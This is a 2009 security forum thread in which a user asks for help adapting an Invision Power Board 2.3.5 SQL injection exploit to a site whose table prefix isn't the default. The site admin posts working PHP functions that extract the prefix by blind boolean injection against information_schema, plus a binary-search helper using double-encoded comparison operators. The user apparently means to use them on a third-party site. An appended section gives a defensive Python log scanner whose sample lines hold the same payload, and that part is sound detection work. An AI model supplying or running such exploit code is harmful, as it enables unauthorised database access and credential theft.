IT Security and Insecurity Portal

IPB <= 2.3.5 injection - Get table prefix and usernames?
Posted: Sat Jul 11, 2009 6:00 pm
Active user
Joined: Nov 15, 2008
Posts: 27

Hi everyone,

I've been using waraxe's IPB <= 2.3.5 (version 1.2). I've come across what would be a vulnerable site, but the table prefix isn't ibf_. Another issue is getting the username, since I'm guessing most people rely on the display name being the username.

I can code PHP pretty well, but my MySQL knowledge is pretty primitive. Does anyone have a script out there that either gets the table prefix, or a username from the user id? If not, if someone could so much as present the concept, I'd love to try and write a script for it and share. I've been semi-studying waraxe's script, and I get a lot of it, but the MySQL stuff still kinda tarts me out lol.
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Someone already did the modifications you are interested in:


And for your information - here is a code snippet that does the prefix fetching magic:


function get_prefix()
{
    $out = '';
    echo "Fetching prefix ...\n";

    // Blind check: exactly one table in the current database matches '%members_converge'
    $p = '(SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() AND table_name LIKE 0x256d656d626572735f636f6e7665726765)=1';
    if(test_condition($p) === false)
    {
        die('Failed check for table count');
    }

    // Binary-search the full table name length, then subtract strlen('members_converge') == 16
    $p = '(SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() AND table_name LIKE 0x256d656d626572735f636f6e7665726765)';
    $len = get_num(0, 100, $p);
    $len -= 16;
    if($len < 0)
    {
        die('Prefix fetch failed!');
    }
    echo "prefix length is $len bytes\n";

    //%_members_converge == 0x256d656d626572735f636f6e7665726765
    $p = "(SELECT ORD(SUBSTR(table_name,%d,1)) FROM information_schema.tables WHERE table_schema=DATABASE() AND table_name LIKE 0x256d656d626572735f636f6e7665726765)";

    // Recover the prefix one character at a time via its ASCII code
    for($i = 1; $i < $len + 1; $i ++)
    {
        $p2 = sprintf($p, $i);
        $ch = chr(get_num(32, 128, $p2));
        echo "Got pos $i --> $ch\n";
        $out .= "$ch";
        echo "Current prefix: $out \n";
    }

    echo "\nFinal prefix: $out\n\n";

    return $out;
}

It's coming from a private exploit, but you can modify it for your own needs.

P.S. The MySQL version needs to be >= 5.0 because of the information_schema meta database. If MySQL is older, then you need to use bruteforce or wordlists in order to guess the prefix.
Active user
Joined: Nov 15, 2008
Posts: 27

Very cool, thanks a lot waraxe

edit: any chance you could include the get_num function as well? It calls it and I don't have it. It would save me a lot of time <3
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

renaker wrote:
Very cool, thanks a lot waraxe

edit: any chance you could include the get_num function as well? It calls it and I don't have it. It would save me a lot of time <3


function get_num($min, $max, $pattern)
{
    $curr = $out = 0;

    // Binary search for the integer value of $pattern between $min and $max,
    // asking the boolean oracle test_condition() one comparison per round
    while(true)
    {
        $area = $max - $min;
        if($area < 2 )
        {
            // Interval is down to two candidates: test equality with $max, else it is $min
            $post = $pattern . "=$max";
            $eq = test_condition($post);
            if($eq)
            {
                $out = $max;
            }
            else
            {
                $out = $min;
            }
            break;
        }

        $half = intval(floor($area / 2));
        $curr = $min + $half;

        // '%253e' is a double-URL-encoded '>'
        $post = $pattern . '%253e' . $curr;

        $bigger = test_condition($post);

        if($bigger)
        {
            $min = $curr;
        }
        else
        {
            $max = $curr;
        }

        echo "Current test: $curr-$max-$min\n";
    }

    return $out;
}
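The two snippets in this thread (get_prefix and the get_num binary search it relies on) ask the database one yes/no question per request, so the probing leaves a very regular trail in the web server's access log. As an added example, not waraxe's code and not part of the thread, here is a small Python log scanner written from the defender's side: it flags the signatures this kind of probe cannot avoid (a reference to information_schema, a hex-encoded string literal, and a double-encoded comparison operator like the '%253e' above) and, separately, a burst of requests from one client that differ only in the probed number. The log lines are constructed for the example; the Apache-style line format, the path layout and the burst threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines (not from the page or any real server).
# 10.0.0.9 walks the length probe from the thread with a different number each
# time; 10.0.0.5 is an ordinary forum visitor.
PROBE = ("/index.php?act=Search&id=1%20AND%20(SELECT%20LENGTH(table_name)%20FROM%20"
         "information_schema.tables%20WHERE%20table_name%20LIKE%20"
         "0x256d656d626572735f636f6e7665726765)%253e{n}")

SAMPLE_LINES = [
    '10.0.0.5 - - [11/Jul/2009:18:00:01 +0000] "GET /index.php?showtopic=42 HTTP/1.1" 200 4096',
] + [
    '10.0.0.9 - - [11/Jul/2009:18:00:%02d +0000] "GET %s HTTP/1.1" 200 5120'
    % (i + 2, PROBE.format(n=n))
    for i, n in enumerate((50, 25, 12, 18, 15))
] + [
    '10.0.0.5 - - [11/Jul/2009:18:00:09 +0000] "GET /index.php?showuser=7 HTTP/1.1" 200 4096',
]

# Assumed common-log-format layout: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
HEX_LITERAL = re.compile(r'0x([0-9a-f]{8,})', re.I)
DOUBLE_ENC_OP = re.compile(r'%25(3c|3e|3d)', re.I)   # %253c / %253e / %253d -> < > =
NUM_RE = re.compile(r'\d+')


def decode_twice(s):
    """Undo two rounds of URL encoding, which is what '%253e' needs to become '>'."""
    return unquote(unquote(s))


def signature_hits(raw_path):
    """Return the names of injection signatures present in one request path."""
    hits = []
    decoded = decode_twice(raw_path).lower()
    if 'information_schema' in decoded:
        hits.append('information_schema')
    if DOUBLE_ENC_OP.search(raw_path):
        hits.append('double_encoded_operator')
    for m in HEX_LITERAL.finditer(decoded):
        try:
            text = bytes.fromhex(m.group(1)).decode('ascii')
        except ValueError:          # odd length or non-ASCII bytes: not a string literal
            continue
        if text.isprintable():
            hits.append('hex_string_literal:' + text)
    return hits


def probe_template(raw_path):
    """Blank every number so requests that differ only by the probed value collapse."""
    return NUM_RE.sub('#', decode_twice(raw_path).lower())


def analyze(lines, probe_threshold=4):
    """Return {ip: report} for clients showing injection signatures or a probe burst."""
    per_ip = defaultdict(lambda: {'signatures': set(), 'templates': defaultdict(set)})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m.group('ip'), m.group('path')
        rec = per_ip[ip]
        rec['signatures'].update(signature_hits(path))
        # remember the distinct numeric values seen for each request shape
        nums = tuple(NUM_RE.findall(decode_twice(path)))
        rec['templates'][probe_template(path)].add(nums)
    report = {}
    for ip, rec in per_ip.items():
        bursts = [t for t, vals in rec['templates'].items() if len(vals) >= probe_threshold]
        if rec['signatures'] or bursts:
            report[ip] = {'signatures': sorted(rec['signatures']), 'probe_bursts': len(bursts)}
    return report


if __name__ == '__main__':
    for ip, rep in analyze(SAMPLE_LINES).items():
        print(ip, rep)
```

The burst rule is the one worth keeping even if an attacker changes the query text: a binary search needs roughly log2(range) requests per value, all identical except for the number being compared, so grouping by the number-blanked template catches it without any keyword list.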
Active user
Joined: Nov 15, 2008
Posts: 27

Thanks again.
